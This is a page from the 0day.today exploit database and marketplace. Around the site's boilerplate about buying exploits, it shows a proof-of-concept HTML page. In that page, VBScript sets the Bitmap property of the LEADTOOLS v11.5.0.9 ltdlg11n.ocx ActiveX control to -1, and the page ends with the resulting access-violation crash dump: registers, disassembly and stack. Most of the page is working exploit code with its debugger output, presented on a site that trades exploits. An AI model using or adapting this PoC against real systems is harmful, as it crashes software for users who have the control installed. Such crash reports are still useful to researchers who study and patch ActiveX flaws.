0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LEADTOOLS v11.5.0.9 ltdlg11n.ocx Bitmap Access Violation
======================================================== LEADTOOLS v11.5.0.9 ltdlg11n.ocx Bitmap Access Violation ======================================================== <html> Test Exploit Page <object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object> <script language='vbscript'> targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LEADDlgLib.LEADDlg" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> Exception Code: ACCESS_VIOLATION Disasm: AA62D2 CMP DWORD PTR [EAX],6461656C Seh Chain: -------------------------------------------------- 1 73352960 VBSCRIPT.dll 2 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- Registers: -------------------------------------------------- EIP 00AA62D2 EAX 00000000 EBX 7C80FF22 -> A868146A ECX 02AB2128 -> 00000000 EDX 00150608 -> 7C97E5A0 EDI 02AB2128 -> 00000000 ESI 02AB1F58 -> 00AB07C0 EBP FFFFFFFF ESP 0013ED98 -> 00AA6292 Block Disassembly: -------------------------------------------------- AA62BE POP EBX AA62BF RETN 8 AA62C2 PUSH DWORD PTR [ESP+4] AA62C6 CALL [AB00EC] AA62CC MOV ECX,[ESP+8] AA62D0 MOV [ECX],EAX AA62D2 CMP DWORD PTR [EAX],6461656C <--- CRASH AA62D8 JE SHORT 00AA62DF AA62DA AND DWORD PTR [ECX],0 AA62DD JMP SHORT 00AA62E2 AA62DF MOV EAX,[EAX+8] AA62E2 RETN 8 AA62E5 PUSH ESI AA62E6 MOV ESI,[ESP+8] AA62EA LEA ECX,[ESI-60] Stack Dump: -------------------------------------------------- 13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00 [.b..............] 13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77 [.`...........\.w] 13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02 [X...............] 13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02 [....\....b.wX...] 13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00 [`...............] ApiLog -------------------------------------------------- ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) # 0day.today [2024-12-24] #